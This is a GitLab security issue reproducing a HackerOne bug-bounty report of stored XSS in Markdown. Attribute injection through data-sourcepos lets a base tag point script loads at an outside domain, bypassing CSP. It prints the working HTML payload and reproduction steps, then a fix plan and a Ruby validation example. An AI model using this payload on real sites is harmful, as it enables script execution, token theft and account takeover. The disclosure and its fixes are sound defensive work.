Stored XSS in Notes (with CSP bypass for gitlab.com)
HackerOne report #1481207 by joaxcar on 2022-02-14, assigned to @ngeorge1:
Report
Summary
I read issue 345657, which handles the XSS in notes reported in HackerOne report 1398305. This issue fixes the reported XSS but leaves the HTML injection that was also mentioned. I don't know how you deal with these situations, but I thought I'd report this, and you can decide :)
The issue linked above shows how a user can inject HTML in any Note (actually any Markdown it seems. For example wiki pages and issue descriptions) by abusing syntax_highlight_filter.rb.
There are more ways to take this injection and weaponize it than the patched Emoji tag. I have a list of additional vectors but thought that I would report the worst one (proper full stored XSS) and explain more if you decide to accept the report, so as not to waste our time.
I have multiple ways to inject script tags, but it looks like you have hardened your CSP? None of the old bypasses worked for me. But it still seems that you have not blocked the base tag. And fortunately for me, the injection let me pass in base tags. So by entering this into an issue description or wiki page
```html
<pre data-sourcepos=""%22 href="x"></pre>
<base href=https://joaxcar.com>
<pre x="">
<code></code></pre>
```
all relative links in the page will try to load their data from my site "joaxcar.com". If we then open DevTools and reload the page, we will see the names of all files that failed to load. In the case of an issue page, we have this script
http://joaxcar.com/assets/webpack/hello.4948f350.chunk.js
and for a wiki page we have
https://joaxcar.com/assets/webpack/top_nav.c9763726.chunk.js
Now I just have to create these files on my domain, and they will load and bypass CSP (as these script tags have a nonce in place and can thus load anything).
Steps to reproduce
- log in as a user on Gitlab.com
- go to any project (or create one), and add a new issue
- enter this as the description (replace with your own server if you need to generate new scripts on your own domain)

```html
<pre data-sourcepos=""%22 href="x"></pre>
<base href=https://joaxcar.com>
<pre x="">
<code></code></pre>
```
- save the issue
- open DevTools (F12) and look for failing script imports
- create the missing script on your domain containing `alert(document.domain)`
- reload the page and the popup should pop
Impact
Stored XSS in gitlab.com
There is more that can be added to the report, but I am sending this in first and will add information later. The XSS can, as you know, create tokens (and, as I have shown before, take over SSO accounts).
What is the current bug behavior?
HTML injection in Markdown
What is the expected correct behavior?
Should not be possible
Output of checks
This bug happens on GitLab.com
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
Implementation Plan
Issue | Description | Department
---|---|---
# | Add strict validation allowing only number range for data-sourcepos attribute | backend
# | Escape user input when generating highlight html | backend
#241857 (closed) | Add v-safe-html for rendering markdown | frontend
# | Avoid generating html strings in gl_field_error.js | frontend
#338075 (closed) | Add base-uri directive in the CSP of GitLab.com | security
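The following Ruby is an added illustration of the two backend items and the CSP item in the plan above; it is not GitLab's code from syntax_highlight_filter.rb. It assumes the `data-sourcepos` value emitted by the Markdown renderer has the cmark `startline:startcol-endline:endcol` shape, rejects anything else (such as the `"%22 href="x"` string from the report), HTML-escapes every attribute value so a quote cannot close the attribute, and checks whether a Content-Security-Policy header value carries a restrictive `base-uri` directive. The function names are hypothetical.

```ruby
require 'erb'

# Constructed example, not GitLab's implementation.

# cmark's --sourcepos output looks like "3:1-7:12"; only that shape is accepted.
SOURCEPOS_PATTERN = /\A\d+:\d+-\d+:\d+\z/

def valid_sourcepos?(value)
  return false if value.nil?

  value.match?(SOURCEPOS_PATTERN)
end

# Build the <pre> wrapper for a highlighted block. Every attribute value is
# HTML-escaped, and data-sourcepos is dropped entirely unless it is a valid
# position range, so user-controlled text can never break out of an attribute.
def highlight_pre_tag(lang:, sourcepos:)
  attrs = ['class="code highlight"', "lang=\"#{ERB::Util.html_escape(lang)}\""]
  attrs << "data-sourcepos=\"#{sourcepos}\"" if valid_sourcepos?(sourcepos)
  "<pre #{attrs.join(' ')}><code></code></pre>"
end

# True when the CSP header value contains a base-uri directive whose source
# list is non-empty and not a wildcard, i.e. <base href> to an attacker host
# would be blocked by the browser.
def csp_restricts_base_uri?(csp)
  directives = csp.split(';').map { |d| d.strip.split(/\s+/) }
  base = directives.find { |d| d.first == 'base-uri' }
  return false if base.nil?

  sources = base.drop(1)
  !sources.empty? && !sources.include?('*')
end

if $PROGRAM_NAME == __FILE__
  puts highlight_pre_tag(lang: 'ruby', sourcepos: '1:1-3:10')
  # The injected attribute from the report is rejected, not echoed:
  puts highlight_pre_tag(lang: 'ruby', sourcepos: '"%22 href="x"')
  puts csp_restricts_base_uri?("default-src 'self'; script-src 'nonce-x'")
  puts csp_restricts_base_uri?("default-src 'self'; base-uri 'self'")
end
```

Rejecting the attribute outright (rather than escaping it) is the simpler contract for a value the renderer itself produces: a legitimate `data-sourcepos` never contains quotes or spaces, so any such input is a sign of tampering and nothing is lost by dropping it.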